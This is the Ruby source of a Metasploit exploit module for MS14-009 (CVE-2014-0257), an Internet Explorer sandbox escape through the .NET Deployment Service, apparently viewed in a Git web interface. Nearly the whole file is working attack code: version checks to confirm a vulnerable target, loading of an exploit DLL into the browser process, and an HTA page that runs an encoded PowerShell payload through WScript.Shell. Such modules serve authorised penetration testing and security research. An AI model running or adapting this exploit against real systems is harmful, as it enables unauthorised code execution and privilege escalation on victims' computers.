metasploit-framework/modules/exploits/windows/local/ms14_009_ie_dfsvc.rb

165 lines
5.1 KiB
Ruby
Raw Normal View History

2014-05-29 16:45:19 +00:00
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'rex'
require 'msf/core/exploit/exe'
require 'msf/core/exploit/powershell'
class Metasploit3 < Msf::Exploit::Local
Rank = GreatRanking
include Msf::Exploit::Powershell
include Msf::Exploit::EXE
include Msf::Exploit::Remote::HttpServer
include Msf::Post::Windows::Priv
2014-06-02 01:58:08 +00:00
include Msf::Post::Windows::FileInfo
include Msf::Post::File
2014-05-29 16:45:19 +00:00
2014-06-02 01:58:08 +00:00
NET_VERSIONS = {
'4.5' => {
'dfsvc' => '4.0.30319.17929.17',
'mscorlib' => '4.0.30319.18063.18'
},
'4.5.1' => {
'dfsvc' => '4.0.30319.18408.18',
'mscorlib' => '4.0.30319.18444.18'
}
}
2014-05-29 16:45:19 +00:00
def initialize(info={})
super( update_info( info,
'Name' => 'MS14-009 .NET Deployment Service IE Sandbox Escape',
'Description' => %q{
This module abuses a process creation policy in the Internet Explorer Sandbox which allows
to escape the Enhanced Protected Mode and execute code with Medium Integrity. The problem
exists in the .NET Deployment Service (dfsvc.exe), which can be run as Medium Integrity
Level. Further interaction with the component allows to escape the Enhanced Protected Mode
and execute arbitrary code with Medium Integrity.
},
'License' => MSF_LICENSE,
'Author' =>
[
'James Forshaw', # Vulnerability Discovery and original exploit code
'juan vazquez' # metasploit module
],
'Platform' => [ 'win' ],
'SessionTypes' => [ 'meterpreter' ],
'Stance' => Msf::Exploit::Stance::Aggressive,
'Targets' =>
[
[ 'IE 8 - 11', { } ]
],
'DefaultTarget' => 0,
'DisclosureDate'=> "Feb 11 2014",
'References' =>
[
['CVE', '2014-0257'],
['MSB', 'MS14-009'],
['BID', '65417'],
['URL', 'https://github.com/tyranid/IE11SandboxEscapes']
]
))
register_options(
[
OptInt.new('DELAY', [true, 'Time that the HTTP Server will wait for the payload request', 10])
])
end
def exploit
print_status("Running module against #{sysinfo['Computer']}") unless sysinfo.nil?
mod_handle = session.railgun.kernel32.GetModuleHandleA('iexplore.exe')
if mod_handle['return'] == 0
fail_with(Failure::NotVulnerable, "Not running inside an Internet Explorer process")
end
unless get_integrity_level == INTEGRITY_LEVEL_SID[:low]
fail_with(Failure::NotVulnerable, "Not running at Low Integrity")
end
2014-06-02 01:58:08 +00:00
print_status("Searching .NET Deployment Service (dfsvc.exe)...")
unless file_exist?("#{get_env("windir")}\\Microsoft.NET\\Framework\\v4.0.30319\\dfsvc.exe")
fail_with(Failure::NotVulnerable, ".NET Deployment Service (dfsvc.exe) not found")
end
2014-06-02 01:58:08 +00:00
dfsvc_version = file_version("#{get_env("windir")}\\Microsoft.NET\\Framework\\v4.0.30319\\dfsvc.exe")
dfsvc_version = dfsvc_version.join(".")
net_version = ""
NET_VERSIONS.each do |k,v|
if v["dfsvc"] == dfsvc_version
net_version = k
end
end
if net_version.empty?
fail_with(Failure::NotVulnerable, "This module only targets .NET Deployment Service from .NET 4.5 and .NET 4.5.1")
end
print_good(".NET Deployment Service from .NET #{net_version} found.")
print_status("Checking if .NET is patched...")
unless file_exist?("#{get_env("windir")}\\Microsoft.NET\\Framework\\v4.0.30319\\mscorlib.dll")
fail_with(Failure::NotVulnerable, ".NET Installation can not be verified (mscorlib.dll not found)")
end
mscorlib_version = file_version("#{get_env("windir")}\\Microsoft.NET\\Framework\\v4.0.30319\\mscorlib.dll")
mscorlib_version = mscorlib_version.join(".")
unless mscorlib_version < NET_VERSIONS[net_version]["mscorlib"]
fail_with(Failure::NotVulnerable, ".NET Installation not vulnerable")
end
print_good(".NET looks vulnerable, exploiting...")
2014-05-29 16:45:19 +00:00
begin
Timeout.timeout(datastore['DELAY']) { super }
rescue Timeout::Error
end
2014-05-30 17:20:00 +00:00
session.railgun.kernel32.SetEnvironmentVariableA("MYURL", nil)
2014-05-29 16:45:19 +00:00
end
def primer
exploit_uri = "#{get_uri}/#{rand_text_alpha(4 + rand(4))}.hta"
session.railgun.kernel32.SetEnvironmentVariableA("MYURL", exploit_uri)
temp = get_env('TEMP')
2014-05-29 16:45:19 +00:00
print_status("Loading Exploit Library...")
session.core.load_library(
'LibraryFilePath' => ::File.join(Msf::Config.data_directory, "exploits", "CVE-2014-0257", "CVE-2014-0257.dll"),
'TargetFilePath' => temp + "\\CVE-2014-0257.dll",
'UploadLibrary' => true,
'Extension' => false,
'SaveToDisk' => false
)
end
def on_request_uri(cli, request)
if request.uri =~ /\.hta$/
print_status("Sending hta...")
hta = <<-eos
<script>
2014-05-29 23:12:18 +00:00
var command = "#{cmd_psh_payload(payload.encoded).strip}";
2014-05-29 16:45:19 +00:00
var shell = new ActiveXObject("WScript.Shell");
shell.Run(command);
</script>
eos
send_response(cli, hta, {'Content-Type'=>'application/hta'})
else
send_not_found(cli)
end
end
end